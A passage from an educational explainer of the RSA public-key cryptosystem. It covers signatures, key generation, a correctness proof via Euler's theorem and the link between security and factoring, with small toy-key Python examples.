Note that the decryption function can be applied to any message, whether or not it is a ciphertext. He then encrypts $S$ using $E_A$ (for privacy) and sends the result $E_A(S)$ to Alice. $M$ does not need to be sent, because Alice can recover it from $S$:

$$M=E_B(S)$$ (where $E_B$ is public)

A message-signature pair $(M, S)$ is made, and Bob cannot deny it since only he could have used $D_B$ to generate $S$. Moreover, $M$ cannot be modified by Alice, since she would then have to create the corresponding signature $S$ as well.

Therefore, the message-signature pair serves as proof for both Alice and Bob.

RSA Overview

RSA encrypts with a public encryption key $(e, n)$, where $e, n \in \mathbb{Z}^+$. The message $M$ should be less than $n$. The message is then encrypted by the following formula, giving the ciphertext $C$.

$$C=M^e\mod n$$

The ciphertext $C$ can be decrypted by raising it to the power $d$ modulo $n$; the following formula describes this process.

$$M=C^d \mod n$$

Hence, the encryption key is $(e, n)$, and the decryption key is $(d, n)$. And users make their encryption key public and keep the corresponding decryption key secret.
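A toy example in Python makes the two formulas tangible. The key below is built from the small primes $p = 61$ and $q = 53$, which are assumed here purely for illustration and are far too small for real use.

```python
# Toy key (far too small for real use): p = 61, q = 53, so n = 3233.
n, e, d = 3233, 17, 2753

def encrypt(m, e, n):
    return pow(m, e, n)      # C = M^e mod n

def decrypt(c, d, n):
    return pow(c, d, n)      # M = C^d mod n

m = 65                       # the message must be smaller than n
c = encrypt(m, e, n)
print(c, decrypt(c, d, n))   # the second number is 65 again
```

Python's three-argument `pow` performs modular exponentiation directly, so the huge intermediate power is never materialized.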

RSA Algorithm

In the previous section, RSA Overview, $e$ and $d$ need to be calculated as a pair. The way of choosing appropriate $e$ and $d$ is as follows. Randomly choose two large primes $p$ and $q$, and calculate $n$ by the following formula, making sure that $n$ is larger than the message to be encrypted.

$$n=p\cdot q$$

Then find a $d$ which is relatively prime to $(p-1)\cdot(q-1)$.

$$\gcd[d, (p-1)\cdot(q-1)] = 1$$

And find the corresponding $e$ by calculating the modular inverse.

$$(e\cdot d) \equiv 1 \quad (\text{mod} (p-1)\cdot(q-1))$$

The greatest common divisor in the preceding step can be calculated using the Euclidean algorithm in $\mathcal{O}(\log N)$ time. As for the modular inverse, since we know $d$ and $(p-1)\cdot(q-1)$, $e$ can be solved for by applying the extended Euclidean algorithm in $\mathcal{O}(\log(\min(d, (p-1)\cdot(q-1))))$ time.

At this point, the key calculations are finished, and we have $(e,n)$ and $(d,n)$, which are the encryption key (public) and the decryption key (private).
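The key generation steps can be sketched in Python as follows. The primes and the chosen $d$ are toy values assumed for the example, and the function names are hypothetical; a real implementation would pick large random primes.

```python
def extended_gcd(a, b):
    """Return (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    if b == 0:
        return a, 1, 0
    g, x, y = extended_gcd(b, a % b)
    return g, y, x - (a // b) * y

def make_keys(p, q, d):
    """n = p*q, check gcd(d, (p-1)(q-1)) = 1, then e = d^-1 mod (p-1)(q-1)."""
    n, phi = p * q, (p - 1) * (q - 1)
    g, x, _ = extended_gcd(d, phi)
    if g != 1:
        raise ValueError("d must be relatively prime to (p-1)(q-1)")
    e = x % phi                      # bring the Bezout coefficient into [0, phi)
    return (e, n), (d, n)

public, private = make_keys(61, 53, 2753)
print(public, private)               # (17, 3233) (2753, 3233)
```

The extended Euclidean algorithm returns the gcd and the coefficient $x$ with $d \cdot x \equiv 1$ in one pass, so the gcd check and the inverse come from the same call.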

How RSA Works

The Euler totient function $\phi(n)$ [2] returns the number of positive integers less than $n$ that are relatively prime to $n$. For example, if $p$ is a prime, then

$$\phi(p)=p-1$$

Since the algorithm calculates $n=p\cdot q$ with distinct primes $p$ and $q$, by elementary properties of the totient function

$$\phi(n) = \phi(p) \cdot \phi(q) = (p-1)\cdot(q-1)$$

Since $d$ is relatively prime to $\phi(n)$ because of $\gcd[d, (p-1)\cdot(q-1)] = 1$, it has a multiplicative modulo inverse $e$ in the ring of integers modulo $\phi(n)$.

$$(e\cdot d) \equiv 1 \quad (\text{mod}\phi(n))$$

By the functionality of encryption and decryption

$$D(E(M)) \equiv (E(M))^d \equiv (M^e) ^d (\text{mod} n) = M^{e \cdot d} (\text{mod} n)$$ (encryption and decryption)

$$E(D(M)) \equiv (D(M))^e \equiv (M^d) ^e (\text{mod} n) = M^{e \cdot d} (\text{mod} n)$$ (signaturing)

and

$$M^{e \cdot d} \equiv M^{k \cdot \phi(n) + 1} (\text{mod} n)$$ (for some integer $k$, since $e$ is the multiplicative inverse of $d$ modulo $\phi(n)$)

by Euler and Fermat: for any integer $M$ which is relatively prime to $n$

$$M^{\phi(n)} \equiv 1 (\text{mod} n)$$

for all $M$ such that $p$ does not divide $M$

$$M^{p-1} \equiv 1 (\text{mod}p)$$

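and since $(p-1)$ divides $\phi(n)$, the following holds for such $M$; it also holds trivially when $p$ divides $M$, because both sides are then congruent to $0$ modulo $p$.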

$$M^{k \cdot \phi(n) + 1} \equiv M (\text{mod}p)$$

Similarly, $(q-1)$ divides $\phi(n)$,

$$M^{k \cdot \phi(n) + 1} \equiv M (\text{mod}q)$$

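Because $p$ and $q$ are distinct primes, the two congruences combine into one modulo $n = p \cdot q$. Hence, for all $M$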

$$M^{e \cdot d} \equiv M^{k \cdot \phi(n) + 1} \equiv M (\text{mod} n)$$

This proves that $M$ can be recovered by decrypting with $(d, n)$.
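The result can also be checked by brute force on a toy key. The sketch below assumes the small key from $p = 61$ and $q = 53$ (illustrative values only) and verifies both directions for every residue, including the multiples of $p$ and $q$ that are not relatively prime to $n$. It then runs the signature flow from the Signatures section.

```python
n, e, d = 3233, 17, 2753     # toy key from p = 61, q = 53

# D(E(M)) = M and E(D(M)) = M for every residue modulo n.
assert all(pow(pow(m, e, n), d, n) == m for m in range(n))
assert all(pow(pow(m, d, n), e, n) == m for m in range(n))

# Signature flow: Bob signs with his private d, anyone verifies with public e.
message = 1234
signature = pow(message, d, n)       # S = D_B(M)
recovered = pow(signature, e, n)     # M = E_B(S)
print(recovered == message)          # True
```

The second loop is the permutation property (d), which is exactly what makes signatures possible.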

RSA Reliability

All the mathematical variables used in the algorithm are $p, q, n, e, d, \phi(n)$. According to the process, only $(e, n)$ is public, while $p, q, d,\phi(n)$ are private; $d$ is a component of the private key and must be kept secret.

To assess the reliability of RSA, we should figure out whether there is an approach to determine $d$ from only $n$ and $e$. Regarding the algorithm, we have

$$(e\cdot d) \equiv 1 \quad (\text{mod}\;\phi(n))$$

(means we need to determine $\phi(n)$ to calculate $d$, since we already know $e$)

$$\phi(n) = (p-1)(q-1)$$

(means we have to figure out $p$ and $q$, the randomly selected large prime)

$$n = p\cdot q$$

(means that the direct way to get $p$ and $q$ is to factor the large integer $n$)

Hence, the difficulty of factorizing a very large integer determines the reliability of the RSA algorithm. In other words, the more difficult it is to factorize a very large integer, the more reliable the RSA algorithm is.
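The chain above can be replayed in Python on a toy key, where factoring is trivial. The sketch assumes the public key $(17, 3233)$ and uses plain trial division; the function names are hypothetical, and the built-in modular inverse `pow(e, -1, phi)` requires Python 3.8 or newer.

```python
def factor_semiprime(n):
    """Trial division: fine for a toy n, hopeless for the sizes RSA uses."""
    f = 2
    while f * f <= n:
        if n % f == 0:
            return f, n // f
        f += 1
    raise ValueError("n has no nontrivial factor")

def recover_private_exponent(e, n):
    """Factor n, rebuild phi(n), and invert e to obtain d."""
    p, q = factor_semiprime(n)
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)   # modular inverse (Python 3.8+)

print(recover_private_exponent(17, 3233))   # 2753
```

Trial division needs on the order of $\sqrt{n}$ steps, which is instant here but out of reach once $n$ has hundreds of digits.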

In the paper, the authors discuss the fastest known factoring algorithms and note that factoring a number seems to be much more difficult than determining whether it is prime or composite.

Conclusion

RSA is an implementation of public-key cryptography put forward by R. L. Rivest, A. Shamir, and L. Adleman in 1977, and it is broadly applied today. RSA is a relatively slow algorithm. Hence, it is not usually used to encrypt user data directly. Instead, it can establish a private session between two terminals by transmitting shared session keys for symmetric-key cryptography, which are then used for the actual encryption and decryption.

References

Original Paper: Rivest, R. L., Shamir, A., & Adleman, L. (1983). A method for obtaining digital signatures and public-key cryptosystems. Communications of the ACM, 26(1), 96–99. https://doi.org/10.1145/357980.358017

[1] Diffie, W., & Hellman, M. (1976). New directions in cryptography. IEEE Transactions on Information Theory, 22(6), 644–654. https://doi.org/10.1109/tit.1976.1055638
[2] Niven, I., & Zuckerman, H. S. (1972). An Introduction to the Theory of Numbers. Wiley, New York.
